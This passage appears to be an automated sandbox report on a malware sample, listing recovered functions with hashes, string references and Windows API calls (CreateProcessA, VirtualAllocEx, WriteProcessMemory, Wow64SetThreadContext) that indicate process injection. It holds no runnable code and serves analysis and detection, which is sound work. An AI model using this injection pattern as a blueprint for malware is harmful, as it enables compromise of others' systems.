Snapshot File: hcaresult_0_2_6220000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq
API String ID: 0-2306408947
Opcode ID: 991769c342e9b0ab713c42699a13b3e78d84c48ffa9140736e574c8af3e7226c
Instruction ID: 8c5c13b58a9116f48eac050633e5eb00439fa3aa57af939650f1e416ea1c69b6
Opcode Fuzzy Hash: 991769c342e9b0ab713c42699a13b3e78d84c48ffa9140736e574c8af3e7226c
Instruction Fuzzy Hash: 79A1D734E2221ADFDB58DFA5D4486ADBBB2FF89301F108029DD166B390CB755A81CF91

Function 063086F2 Relevance: 2.7, Strings: 2, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(hq, xrefs: 06308814
(hq, xrefs: 0630886B

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: (hq$(hq
API String ID: 0-2483692461
Opcode ID: 2285e37286aabb820081803044a4f70a615b2f6ba063bd6923bf93f60fe3dd06
Instruction ID: e62efd33c4025ee8c02ef3c149888796760a4da06b18d4e96310e23bd5a19d48
Opcode Fuzzy Hash: 2285e37286aabb820081803044a4f70a615b2f6ba063bd6923bf93f60fe3dd06
Instruction Fuzzy Hash: D851EE317002159FDB559F28E864AAE3BA2FFD4311F10856AE905CB3A1CB35DC4ACBE0

Function 06306150 Relevance: 2.7, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

Hhq, xrefs: 063062E5
(hq, xrefs: 06306256

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: (hq$Hhq
API String ID: 0-2633903351
Opcode ID: ba333fdf3cd0ff50248ee4f4473c53533ea042c05b0d65a8dbdfae7fc8ef06f0
Instruction ID: 483961d2a12342e0863c7a4ba5c0b439a651513847e7d49e19f79044e07063d5
Opcode Fuzzy Hash: ba333fdf3cd0ff50248ee4f4473c53533ea042c05b0d65a8dbdfae7fc8ef06f0
Instruction Fuzzy Hash: 9E519A34B003018FC7A9AF78D86496E7BA6BFD9200710896CD9068B3A4DF35EC06CB91

Function 0631C3C9 Relevance: 2.5, Strings: 2, Instructions: 25COMMON

Download Yara Rule

Strings

&, xrefs: 0631C3D4
u, xrefs: 0631CE81

Memory Dump Source

Source File: 00000000.00000002.1983173645.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6310000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: &$u
API String ID: 0-302417749
Opcode ID: 93be3577ed63edb3329859c4ec5e4c5d60358ee4f12a179881239bca58f07c47
Instruction ID: e67a7b810fdb648c0ae297ccfb2977a2a4cb7e577ce68f8096fe7d3273a65a50
Opcode Fuzzy Hash: 93be3577ed63edb3329859c4ec5e4c5d60358ee4f12a179881239bca58f07c47
Instruction Fuzzy Hash: 23F037B0D09228DFEBA5CF24D88879DB7B0AB05305F1085D9D25CAB240CB780EC9DF89

Function 0630D1A0 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,hq, xrefs: 0630D51B

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: ,hq
API String ID: 0-1771677546
Opcode ID: 0d502b1e2f40c85a84bd212ef6c4adb555d37d529448f82c1fcdec3b17ee7a48
Instruction ID: d42500dada7608f385b9fdcb0d55b926ef8ca02455100a592031fb7134e9638a
Opcode Fuzzy Hash: 0d502b1e2f40c85a84bd212ef6c4adb555d37d529448f82c1fcdec3b17ee7a48
Instruction Fuzzy Hash: 5A521975A102288FDB64DF68C955BEDBBF2BF88300F1541D9E909AB391DA309D84CF61

Function 06307700 Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

(_dq, xrefs: 0630798D

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: (_dq
API String ID: 0-95542857
Opcode ID: 3b712f6886c4f7f3db1ea1882d8c6dddf4b01efe39792566bb1dea4a1f0aa1e5
Instruction ID: 06003bb94d59dd3f917ed19e4bd05c647b0f6c8da82ef6e2f46864ce69f7cbb1
Opcode Fuzzy Hash: 3b712f6886c4f7f3db1ea1882d8c6dddf4b01efe39792566bb1dea4a1f0aa1e5
Instruction Fuzzy Hash: 9C228E71B002059FEB94CFA5D4A4AADBBF6FF88310F14805AE9059B3A1CB75ED44CB90

Function 064A2308 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 064A256F

Memory Dump Source

Source File: 00000000.00000002.1983779655.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: true

Associated: 00000000.00000002.1983655225.0000000006450000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f9a39ccf949c62e069e84e3fe8d212655caf4f5e8ec352482f406d5a8f5132ed
Instruction ID: af85b3d04c18f0dba9c09aa2f84ca4a29e1c68a285deff62f03565132666e26a
Opcode Fuzzy Hash: f9a39ccf949c62e069e84e3fe8d212655caf4f5e8ec352482f406d5a8f5132ed
Instruction Fuzzy Hash: BFA113B0D003189FDF51CFA9C9857EEBBB1BF19300F14956AE858A7280DBB48A85DF45

Function 063E75D4 Relevance: 1.7, APIs: 1, Instructions: 182fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 063E775B

Memory Dump Source

Source File: 00000000.00000002.1983480753.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63e0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: cd7e092f19434d3a7998e83500a80932c89fca8f6143df7d316c5c1c629bc187
Instruction ID: b7583223724eee9b9e534bcb27e344b8d18ff5a4a15bd3872afe7f5d2cc14e9c
Opcode Fuzzy Hash: cd7e092f19434d3a7998e83500a80932c89fca8f6143df7d316c5c1c629bc187
Instruction Fuzzy Hash: 856153B0D003688FDB54CFA9C8857EEBBB1FF09314F248129E855AB290DB748985CF91

Function 063E75E0 Relevance: 1.7, APIs: 1, Instructions: 169fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 063E775B

Memory Dump Source

Source File: 00000000.00000002.1983480753.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63e0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 51aeecab9eeb19e7da1c7674cc0f51d41eeb5f8762d4204acc6c2a4eccecb019
Instruction ID: 84a8197d53f2fc924e90ef688884588fc2c670c1c16da16b31cc2d9cb1b8ea01
Opcode Fuzzy Hash: 51aeecab9eeb19e7da1c7674cc0f51d41eeb5f8762d4204acc6c2a4eccecb019
Instruction Fuzzy Hash: B56122B0D003288FDB54CFA9C9857EDBBB1FB49314F248129E819A7290DB789985CF95

Function 0630E02D Relevance: 1.7, Strings: 1, Instructions: 408COMMON

Download Yara Rule

Strings

$dq, xrefs: 0630E16F

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: $dq
API String ID: 0-847773763
Opcode ID: 03ac1cb77d929711b2a7f7f3085350d35d8af1003be91b1f7c9f965c09ad4f75
Instruction ID: dec2d246bbdd0e2e2c7244a01e87db82f139d77e548abe6c0ab536375525a4f2
Opcode Fuzzy Hash: 03ac1cb77d929711b2a7f7f3085350d35d8af1003be91b1f7c9f965c09ad4f75
Instruction Fuzzy Hash: E4E1B4747042028FEBA59F25D42566E7BE6BF85301F144C69E982CB7E1EB34CC49CBA1

Function 064A3568 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 064A363B

Memory Dump Source

Source File: 00000000.00000002.1983779655.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: true

Associated: 00000000.00000002.1983655225.0000000006450000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5a3584da07f54b8b6fb0aac299f67ec59f9cc8606601c176d7d2b4bfb44e6e57
Instruction ID: b2188d422ff1b478d4100eb6411b536ea5e6e21ceffdbf01b2bde63fdf51f12f
Opcode Fuzzy Hash: 5a3584da07f54b8b6fb0aac299f67ec59f9cc8606601c176d7d2b4bfb44e6e57
Instruction Fuzzy Hash: 9A4198B4D012589FCF10CFA9D984ADEFBF1BB59310F24902AE818B7240D735AA45CB64

Function 064A3268 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 064A3312

Memory Dump Source

Source File: 00000000.00000002.1983779655.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: true

Associated: 00000000.00000002.1983655225.0000000006450000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 27a03532414d55e11d406955c1f6dbd16a54abc2ba50bc24cb9a45438cda6798
Instruction ID: b790eff985b2e32154779428451577f754c9648a56a43531333487e868e0952f
Opcode Fuzzy Hash: 27a03532414d55e11d406955c1f6dbd16a54abc2ba50bc24cb9a45438cda6798
Instruction Fuzzy Hash: 3B3197B8D04258AFCF10CFA9D880A9EFBB5BB59310F10942AE815B7200D735A905CF68

Function 015DFE40 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 015DFEE4

Memory Dump Source

Source File: 00000000.00000002.1959206527.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15d0000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 019963d4f9cea34dc94232b9ccc9cda98d65a307ca32b558098cfbecd1592376
Instruction ID: 6cc40ad0dce08beaee960877491a87c8642259d76606850e6a2fd262a30b0a41
Opcode Fuzzy Hash: 019963d4f9cea34dc94232b9ccc9cda98d65a307ca32b558098cfbecd1592376
Instruction Fuzzy Hash: C13197B4D012489FCF14CFA9D984A9EFBF5FB49310F24942AE819B7210D735A946CF98

Function 064A2BC0 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 064A2C6F

Memory Dump Source

Source File: 00000000.00000002.1983779655.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: true

Associated: 00000000.00000002.1983655225.0000000006450000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7ad0ebbcb4064837bebc5b193e9f2ec3235dfd4350a306550245480f6a43a1b5
Instruction ID: 0df6e678945f8c2b2a9e3aec9beafffce71ade7bc545c3007629d8907cd16377
Opcode Fuzzy Hash: 7ad0ebbcb4064837bebc5b193e9f2ec3235dfd4350a306550245480f6a43a1b5
Instruction Fuzzy Hash: 9C31CDB4D002589FDB10CFA9D884AEEFBF1BF59310F14802AE418B7240D778AA45CF54

Function 0659CC08 Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(?,?), ref: 0659CCA2

Memory Dump Source

Source File: 00000000.00000002.1984271945.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 44c87becf4a3c200cdbc591c301f1dd52f755f8efc19dacd512c3d62800fad8e
Instruction ID: bfe376cc3320b0eda4f209f14c9e348379041a71cfe8bce9f3c6ed20f2b0264a
Opcode Fuzzy Hash: 44c87becf4a3c200cdbc591c301f1dd52f755f8efc19dacd512c3d62800fad8e
Instruction Fuzzy Hash: 4531CBB5D012189FCF10CFA9D984A9EFBF5BF49310F14942AE815B7240C778A945CFA4

Function 0659CC10 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(?,?), ref: 0659CCA2

Memory Dump Source

Source File: 00000000.00000002.1984271945.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6590000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 5ee091acb93f39170263e695dd3dd158366306e642ca0d85d45345efa71af0d3
Instruction ID: 541d4a737f9fce3d33323ee2293271e54b1342c02d2c536e9d8557bd74f05b22
Opcode Fuzzy Hash: 5ee091acb93f39170263e695dd3dd158366306e642ca0d85d45345efa71af0d3
Instruction Fuzzy Hash: 3331AAB4D012589FCF10CFA9D984ADEFBF5BB49310F14942AE815B7240C735A945CFA8

Function 06307E70 Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

Pldq, xrefs: 06308058

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: Pldq
API String ID: 0-2367098355
Opcode ID: 753e14e60fe64bee0151eeecfc4ba715bf5314ad3612553bc566f1957a11bcb7
Instruction ID: 6d2175b5087994fb8dba4a87737b1728957c6d6f60bcc5b2dd12fbe2aee56945
Opcode Fuzzy Hash: 753e14e60fe64bee0151eeecfc4ba715bf5314ad3612553bc566f1957a11bcb7
Instruction Fuzzy Hash: 2B913374B002148FDB54DF28C894AAA7BF6BF89310B1184A9E505CF3B5DB71EC49CBA1

Function 0630C2B8 Relevance: 1.5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

Strings

4'dq, xrefs: 0630C4E2

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: 4'dq
API String ID: 0-1167855494
Opcode ID: 9df2e6c8360f938965ee03a5b5a8fd064b2eee0e579ac52143f412693b0046bc
Instruction ID: 405941c9f15bc6283cb5cc439cd357623b428e870b9ace3752d33819de4921aa
Opcode Fuzzy Hash: 9df2e6c8360f938965ee03a5b5a8fd064b2eee0e579ac52143f412693b0046bc
Instruction Fuzzy Hash: 50A11F34A10218DFDB44DFA4D8A899DB7B6FF88300F558255E416AB3A5DB30EC4ACF91

Function 06303DF0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

,hq, xrefs: 06303E53

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: ,hq
API String ID: 0-1771677546
Opcode ID: 2bb76aa81a4e447f795be7ebe1f8827ccda69ae952a12613d9d86662e6b24fc8
Instruction ID: 3ce678c026f0be9596b456c11f3849560473476cc729ecf4c024e9dea22224c1
Opcode Fuzzy Hash: 2bb76aa81a4e447f795be7ebe1f8827ccda69ae952a12613d9d86662e6b24fc8
Instruction Fuzzy Hash: 4E517C35B001168FDB14DF69D8909AEBBE6FF89311B158169E905DB3A1CB31EC05CBE1

Function 06302F10 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

(hq, xrefs: 06302F84

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: (hq
API String ID: 0-4060669308
Opcode ID: 4563c76887ac964690ab85c2d5b542a04026dfe22589a918e4f7f344055f9276
Instruction ID: 34e3d278ec369c9cd6fba33791164766c2a3afdfe6cd4db183c14fdb2d710fd9
Opcode Fuzzy Hash: 4563c76887ac964690ab85c2d5b542a04026dfe22589a918e4f7f344055f9276
Instruction Fuzzy Hash: B851E331A056168FDB00CF68C494A6BFBB5FF89320F1582A5E9299B381C731F859CBD0

Function 06301F50 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

phq, xrefs: 06302000

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: phq
API String ID: 0-315977702
Opcode ID: ae269e3708804ed74d55296226365eb1bec2b44c4577f86f7149f2356d4452ba
Instruction ID: 670a513ac22fbe4953766ceb88c7092ac4cc72e436f5f4b46f4dc93c45a7d905
Opcode Fuzzy Hash: ae269e3708804ed74d55296226365eb1bec2b44c4577f86f7149f2356d4452ba
Instruction Fuzzy Hash: 2C513A76600104AFCB469FA8DC15D6A7FF7FF8C3147168098E2098B272DA32DC21EB91

Function 06309CAD Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

(hq, xrefs: 06309CD4

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: (hq
API String ID: 0-4060669308
Opcode ID: 94d48bf20ce0b9083ee7039b891ed3c73e0f6d919cfeae18e2942c5505df1fca
Instruction ID: 8f70f5086a4f359160d601393a53114dda7d81b873b0503990a9771a4bf9cc29
Opcode Fuzzy Hash: 94d48bf20ce0b9083ee7039b891ed3c73e0f6d919cfeae18e2942c5505df1fca
Instruction Fuzzy Hash: 5641AF30A00206CFDB54CF29C890AAAF7F6FF89314B599559E4169B391DB34FC59CBA0

Function 06200FD0 Relevance: 1.3, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 06201077

Memory Dump Source

Source File: 00000000.00000002.1982813717.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6200000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5cafb26269f15bcacbbec1aa2294d2460817f3446281444725c08ec2801e0e47
Instruction ID: 1c2914b7d5621635f3912d40da96fbd0996c69aec72bb9cdb995449a82581a3b
Opcode Fuzzy Hash: 5cafb26269f15bcacbbec1aa2294d2460817f3446281444725c08ec2801e0e47
Instruction Fuzzy Hash: BA31C8B4D102489FCF10CFA9E884AEEFBB1AF49320F24942AE819B7250C735A955CF54

Function 0630B338 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

4'dq, xrefs: 0630B381

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: 4'dq
API String ID: 0-1167855494
Opcode ID: 53711a0dd485bbaf073503384f3fd283114487765c04c10799ff20a2c1d79a5e
Instruction ID: 0b32595e58b7cde5f3376ee4470a0a3ef84144ea43bc124d3f8eeb82af6cf9ac
Opcode Fuzzy Hash: 53711a0dd485bbaf073503384f3fd283114487765c04c10799ff20a2c1d79a5e
Instruction Fuzzy Hash: 06319531600204EFDF549F54D858DAABBB6FF8C310B0640A8EA069B371DA32DD16CBD1

Function 06200FD8 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 06201077

Memory Dump Source

Source File: 00000000.00000002.1982813717.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6200000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 842fc65644b3995cd13c5ad4d5c7bf4d46e58ca42bb7536be7d956582d99b621
Instruction ID: b1f70f966edd80dd233471ee7b777045e01a8a93d9891de490121d1efc84c920
Opcode Fuzzy Hash: 842fc65644b3995cd13c5ad4d5c7bf4d46e58ca42bb7536be7d956582d99b621
Instruction Fuzzy Hash: 3D31B8B8D002489FCF10CFA9D884AAEFBB5EF49310F10942AE818B7250C735A955CF98

Function 0630B348 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

4'dq, xrefs: 0630B381

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: 4'dq
API String ID: 0-1167855494
Opcode ID: c4a42c27e0d2ed0d8f8267cd76545138f63302e0aaf51ec7d9adb72d7d123714
Instruction ID: 17b8c054a94e3392386ff6405624db4eb3a769826e50b0cc0b9aefe2eea7985b
Opcode Fuzzy Hash: c4a42c27e0d2ed0d8f8267cd76545138f63302e0aaf51ec7d9adb72d7d123714
Instruction Fuzzy Hash: A3219431B00204AFDF559F54D858D69BBB7FF8C310B0640A8EA069B371DA31DD46CB91

Function 06221E8D Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

4'dq, xrefs: 06222659

Memory Dump Source

Source File: 00000000.00000002.1982853243.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6220000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: 4'dq
API String ID: 0-1167855494
Opcode ID: 837ef7c810e13a900858648dc4ef640503b9c68e8fd069ed29531ef49a5310be
Instruction ID: ee4b25bba284cf93ca6c800adf0fe6758c16905407dd59a113e688296f28e569
Opcode Fuzzy Hash: 837ef7c810e13a900858648dc4ef640503b9c68e8fd069ed29531ef49a5310be
Instruction Fuzzy Hash: E731BC30D2631AEFDB25CFA5D8486FEBBB1EF45301F0080AAD911AB291C7380A45CF91

Function 06306A60 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

p<dq, xrefs: 06306A9A

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: p<dq
API String ID: 0-1100582013
Opcode ID: 0e3cf7874fecf4c0ef985e4eb577921dd23f593f7fdf85bbcc4ca4accc2279ac
Instruction ID: 7740ddb721153b8d3da1275395a48f4505780906cd9ee2cad76444fcd376edce
Opcode Fuzzy Hash: 0e3cf7874fecf4c0ef985e4eb577921dd23f593f7fdf85bbcc4ca4accc2279ac
Instruction Fuzzy Hash: 202183707002559FDB41DF2AC851AAA7BEAEF4A300F198455FC04CB3A5C631DC54CBA0

Function 06306A4F Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

p<dq, xrefs: 06306A9A

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: p<dq
API String ID: 0-1100582013
Opcode ID: 835d7708cd084bfbd6805d89cdd8aaa354ef1b5802f65dd7db289e625c68812e
Instruction ID: bab6927d32b2946516c1c807c9d45c4696d5d1656102f46dcb3c30ad4928e3c5
Opcode Fuzzy Hash: 835d7708cd084bfbd6805d89cdd8aaa354ef1b5802f65dd7db289e625c68812e
Instruction Fuzzy Hash: B621B0707042549FDB06DF29C8519AA7BE6FF8E201B198096F804CB3A5C630DC65CB60

Function 06303DE2 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

,hq, xrefs: 06303E53

Memory Dump Source

Source File: 00000000.00000002.1983135438.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6300000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: ,hq
API String ID: 0-1771677546
Opcode ID: 105a3b65f4e7675c82d78970a7f345f27a2a086765d1b3979e9bc42c251251dc
Instruction ID: e268487f1e1518009d66dd893a2c0ade25b47bb2374874e43bf19d62de80c092
Opcode Fuzzy Hash: 105a3b65f4e7675c82d78970a7f345f27a2a086765d1b3979e9bc42c251251dc
Instruction Fuzzy Hash: 7211AC35A002068FDB00DF68C8649AABBB6EF89300F1081A9E9049B3A1D730EC01CBE1

Function 0631CA4B Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

,, xrefs: 0631B9DF

Memory Dump Source

Source File: 00000000.00000002.1983173645.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6310000_LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.jbxd

Similarity

API ID:
String ID: ,
